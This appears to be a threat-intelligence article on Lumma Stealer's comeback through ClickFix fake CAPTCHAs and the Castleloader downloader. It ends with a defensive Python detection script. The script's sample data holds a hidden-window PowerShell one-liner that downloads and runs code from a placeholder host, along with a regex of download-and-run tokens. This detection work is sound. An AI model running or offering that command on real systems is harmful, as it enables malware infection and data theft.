Lumma Stealer's Resilient Comeback
The Lumma Stealer, a prolific information-stealing malware sold as Malware-as-a-Service (MaaS) since 2022, has staged a significant resurgence. After a May 2025 law-enforcement disruption that neutralized over 2,300 command-and-control domains, its operators migrated to bulletproof hosting providers. Recent campaigns leverage ClickFix bait (fake CAPTCHA prompts) and the advanced Castleloader downloader to deploy Lumma at unprecedented scale, as detailed in Ars Technica's February 2026 report.
Developed by threat actor 'Shamel' (alias 'Lumma'), this C-language stealer targets cryptocurrency wallets, 2FA browser extensions, credentials, cookies, and documents. Its MaaS model enables global affiliates to lease it, fueling hundreds of thousands of infections across industries like healthcare, banking, and telecom.
ClickFix and Castleloader: The New Infection Chain
ClickFix techniques trick users into executing malicious commands via the Windows Run dialog, bypassing browser defenses. Victims encounter fake CAPTCHAs on malvertising sites that instruct them to paste PowerShell code from their clipboard, often disguised as verification steps. This social engineering evades detection because the payload is downloaded outside the browser, by the user's own hand.
Castleloader, a sophisticated loader, then fetches Lumma. It uses evasion tactics such as AMSI bypasses and includes modules for UAC escalation and file manipulation. Campaigns use lures such as cracked software, fake games, and adult-themed downloads, amplifying reach.
- Fake CAPTCHAs prompt clipboard command execution.
- PowerShell retrieves initial payloads from C2 servers.
- Castleloader deploys Lumma, exfiltrating data via HTTP POST.
Why This Matters: Severe Privacy and Financial Risks
Lumma's impact extends beyond theft. It grabs browser sessions for account takeovers, cryptocurrency keys for wallet drains, and documents for identity fraud or extortion. Victims face immediate losses (stolen funds) and long-term threats like targeted phishing using harvested personal files. For businesses, infections in telecom or banking sectors enable corporate breaches and secondary crimes.
One realistic scenario: A marketing professional downloads 'free' cracked software from a malvertising site. A ClickFix CAPTCHA prompts pasting a command; Lumma installs silently, stealing 2FA tokens and crypto wallet data. Days later, attackers drain $10,000 in Bitcoin and access corporate email for spear-phishing.
Technical Deep-Dive: Evasion and Exfiltration
Lumma uses the TeslaBrowser/5.5 user-agent string for C2 communication and targets apps like email clients, FTP, and VPNs. Affiliates at premium tiers access source code for customization. After the 2025 takedown, infrastructure on uncooperative hosting providers sustained operations.
Defenses include behavioral monitoring for clipboard anomalies and PowerShell abuse. Endpoint tools flag AMSI bypasses; user training counters ClickFix deception.
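As an added example (not code from the article, Ars Technica, or any vendor named here), the following Python sketch turns the infection chain listed above and the defensive monitoring mentioned in this paragraph into detection logic: it flags PowerShell launched from the Run dialog (explorer.exe parent) whose command line carries download-and-run or window-hiding tokens, flags outbound HTTP POSTs carrying the TeslaBrowser/5.5 user-agent, and correlates the two per host. The log schema and field names, the sample events, the .invalid domains, the 15-minute window and the POST size threshold are all constructed assumptions for this example.

```python
import re
from datetime import datetime, timedelta

# Constructed sample telemetry (not taken from the article or any real incident).
# Field names follow a Sysmon-style process-creation event and a generic proxy log;
# both the schema and the values are assumptions made for this example.
PROCESS_EVENTS = [
    {"ts": "2026-02-10T09:14:02Z", "host": "WS-017", "parent": "explorer.exe",
     "image": "powershell.exe",
     "cmdline": 'powershell.exe -w hidden -c "iex (irm http://lure.invalid/check)"'},
    {"ts": "2026-02-10T09:20:11Z", "host": "WS-022", "parent": "code.exe",
     "image": "powershell.exe",
     "cmdline": "powershell.exe -File C:\\dev\\build.ps1"},
]
PROXY_EVENTS = [
    {"ts": "2026-02-10T09:14:40Z", "host": "WS-017", "method": "POST",
     "url": "http://c2.invalid/api", "ua": "TeslaBrowser/5.5", "bytes_out": 48211},
    {"ts": "2026-02-10T09:21:00Z", "host": "WS-022", "method": "GET",
     "url": "https://pypi.org/simple/", "ua": "pip/24.0", "bytes_out": 310},
]

# The Run dialog (Win+R) launches its child under explorer.exe, so a PowerShell
# process with that parent is the shape a pasted ClickFix command takes.
INTERACTIVE_PARENTS = {"explorer.exe"}
# Download-and-run / concealment tokens commonly seen in pasted one-liners.
TOKEN_RE = re.compile(
    r"(?:-w(?:indowstyle)?\s+hidden|-e(?:nc|ncodedcommand)\b|-ep\s+bypass"
    r"|\biex\b|invoke-expression|\birm\b|\biwr\b|invoke-webrequest|downloadstring)",
    re.IGNORECASE,
)
# C2 user-agent string named in the article.
LUMMA_USER_AGENT = "TeslaBrowser/5.5"


def parse_ts(s: str) -> datetime:
    return datetime.strptime(s, "%Y-%m-%dT%H:%M:%SZ")


def flag_clickfix_process(ev: dict) -> list:
    """Reasons a process-creation event looks like a ClickFix launch; [] if clean.
    Both conditions (shell parent AND suspicious tokens) are required to limit noise
    from legitimate interactive PowerShell use."""
    if ev["image"].lower() != "powershell.exe":
        return []
    reasons = []
    if ev["parent"].lower() in INTERACTIVE_PARENTS:
        reasons.append("powershell.exe spawned by explorer.exe (Run dialog / shell)")
    hits = sorted({m.group(0).lower() for m in TOKEN_RE.finditer(ev["cmdline"])})
    if hits:
        reasons.append("suspicious tokens: " + ", ".join(hits))
    return reasons if len(reasons) == 2 else []


def flag_lumma_c2(ev: dict) -> list:
    """Reasons a proxy event looks like Lumma C2 / exfiltration traffic; [] if clean."""
    reasons = []
    if ev["ua"] == LUMMA_USER_AGENT:
        reasons.append("Lumma C2 user-agent")
    if ev["method"] == "POST" and ev["bytes_out"] >= 10_000:  # threshold is an assumption
        reasons.append(f"large HTTP POST ({ev['bytes_out']} bytes)")
    return reasons


def correlate(process_events, proxy_events, window=timedelta(minutes=15)) -> list:
    """Join flagged PowerShell launches with flagged outbound traffic from the same
    host inside `window` (assumed 15 minutes): pasted command -> loader -> HTTP POST."""
    alerts = []
    for pe in process_events:
        preasons = flag_clickfix_process(pe)
        if not preasons:
            continue
        t0 = parse_ts(pe["ts"])
        for ne in proxy_events:
            if ne["host"] != pe["host"] or not (t0 <= parse_ts(ne["ts"]) <= t0 + window):
                continue
            nreasons = flag_lumma_c2(ne)
            if nreasons:
                alerts.append({"host": pe["host"], "process": preasons,
                               "network": nreasons, "severity": "high"})
    return alerts


if __name__ == "__main__":
    for alert in correlate(PROCESS_EVENTS, PROXY_EVENTS):
        print(alert)
```

Run as a script it prints one high-severity alert for WS-017 and nothing for the developer's build script on WS-022. In practice you would feed real Sysmon Event ID 1 records and proxy logs through the same two functions, tune the token list and thresholds against your own baseline, and treat a process-only hit (no matching network event yet) as a medium-severity lead worth a look rather than discarding it.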
Forward-Looking Implications
As Lumma evolves with loaders like Castleloader and HijackLoader, expect scaled campaigns blending social engineering and evasion. Law enforcement faces challenges from bulletproof hosting, potentially increasing MaaS proliferation. Organizations must prioritize MDR services and zero-trust models to mitigate infostealer risks. For everyday users, vigilance against CAPTCHA tricks remains crucial: verify what a prompt is asking you to do before executing any command.
Security teams worldwide report heightened Lumma activity, underscoring how one individual's lapse can cascade into widespread harm for families and firms alike.